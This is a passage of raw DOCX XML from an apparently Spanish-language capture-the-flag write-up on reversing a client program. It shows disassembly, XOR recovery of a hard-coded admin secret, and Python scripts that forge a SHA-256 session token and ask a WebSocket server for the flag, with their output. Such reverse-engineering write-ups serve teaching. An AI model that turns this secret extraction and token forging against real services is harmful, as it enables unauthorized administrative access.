          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>14000595f: mov  r9,rdx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>140005967: lea  r8,[rip+0x92aa]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>140005976: call 0x14000c310</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>140005981: call 0x14000570f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Esta función recibía un token ya preparado, lo insertaba en el formato JSON y enviaba el mensaje.</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8. Reconstrucción del algoritmo SHA-256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El análisis de otra rutina reveló las constantes iniciales características de SHA-256:</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mov DWORD PTR [rsp+0x50],0x6a09e667</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov DWORD PTR [rsp+0x54],0xbb67ae85</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov DWORD PTR [rsp+0x58],0x3c6ef372</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov DWORD PTR [rsp+0x5c],0xa54ff53a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov DWORD PTR [rsp+0x60],0x510e527f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov DWORD PTR [rsp+0x64],0x9b05688c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov DWORD PTR [rsp+0x68],0x1f83d9ab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov DWORD PTR [rsp+0x6c],0x5be0cd19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La rutina procesaba una entrada formada por un valor numérico y una cadena interna. Después convertía los primeros 8 bytes del digest en 16 caracteres hexadecimales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>También se recuperó el formato:</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%u%s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Esto indicaba una concatenación del identificador de sesión en decimal con una cadena secreta.</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9. Desofuscación de la clave mediante XOR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La clave no estaba almacenada directamente como texto legible. Se encontraba ofuscada mediante una operación XOR con el byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>0x5A</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El desensamblado contenía:</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14000527a: mov eax,0x33</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>14000528e: xor eax,0x5a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El primer carácter se calculaba así:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>\[ 0x33\oplus0x5A=0x69 \]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>0x69</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> corresponde a la letra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> en ASCII.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Al reconstruir la secuencia completa, se obtuvo:</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inferno_admin_2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La cadena tenía 18 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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Script de extracción</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from pathlib import Pathimport hashlibdata = Path("DataMasAlla.exe").read_bytes()IMAGE_BASE = 0x140000000RDATA_VA = 0xE000RDATA_OFFSET = 0xBC00def offset_pe(va):    return RDATA_OFFSET + (va - IMAGE_BASE - RDATA_VA)pos = offset_pe(0x14000EC4F)raw = data[pos:pos + 128]secret = bytearray([0x33 ^ 0x5A])for b in raw[2:]:    if b == 0:        break    secret.append(b ^ 0x5A)print("Clave:", secret.decode())print("Longitud:", len(secret))session_id = 1018236300message = str(session_id).encode() + bytes(secret)token = hashlib.sha256(message).hexdigest()[:16]print("Entrada:", message)print("Token:", token)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Salida obtenida:</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Clave: inferno_admin_2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Longitud: 18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Entrada: b'1018236300inferno_admin_2024'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Token: a075a8271175dcc8</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10. Fórmula del token administrativo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Tras reconstruir el algoritmo, se obtuvo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>\[ \boxed{\text{Token}=\operatorname{SHA256}(\text{session\_id}\Vert\text{secret})_{\text{hex}}[:16]} \]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Donde:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> es el identificador decimal asignado por </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>HELLO_ACK</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> es la cadena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>inferno_admin_2024</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>[:16]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> indica los primeros 16 caracteres hexadecimales del SHA-256.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Este token debe calcularse nuevamente para cada sesión, porque el identificador cambia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La hipótesis fue finalmente validada cuando el servidor aceptó el token y devolvió una respuesta de tipo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>FLAG</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</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11. Exploit final</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El siguiente script reproduce la explotación confirmada. Establece una sesión WebSocket, obtiene el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, genera el token administrativo y solicita la flag.</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def request(data):    ws.send(json.dumps(data))    response = ws.recv()    print("[RECV]", response)    return json.loads(response)try:    print("[1] Estableciendo sesión")    hello = request({        "type": "HELLO",        "version": "1.3.3.7",        "client_id": "deadbeef-cafe-1337-b00b-c0ffee001337",        "client_ptr": "0x0"    })    if hello.get("type") != "HELLO_ACK":        raise RuntimeError("No se recibió HELLO_ACK")    session_id = int(hello["session_id"])    print("[2] Calculando token")    message = f"{session_id}{SECRET}".encode()    token = hashlib.sha256(message).hexdigest()[:16]    print("[+] Session ID:", session_id)    print("[+] Token:", token)    print("[3] Solicitando flag")    result = request({        "type": "ADMIN_CMD",        "token": token,        "cmd": "get_flag"    })    if result.get("type") == "FLAG":        print("\n[+] FLAG:", result.get("data"))    else:        print("\n[-] Respuesta:", result)finally:    ws.close()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Se ejecutó mediante:</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python3 obtener_flag.py</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12. Obtención de la flag real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La ejecución final produjo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[1] Estableciendo sesión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[RECV] {"type": "HELLO_ACK", "session_id": 3043438582,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"debug_ptr": "0x7fd8b5e04ce9", "client_echo": "0x0",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"server_time": 1792167329,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"motd": "Data del Más Allá v1.0"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[2] Calculando token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[+] Session ID: 3043438582</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[+] Token: 5297b1613add45e6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[3] Solicitando flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[RECV] {"type": "FLAG",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
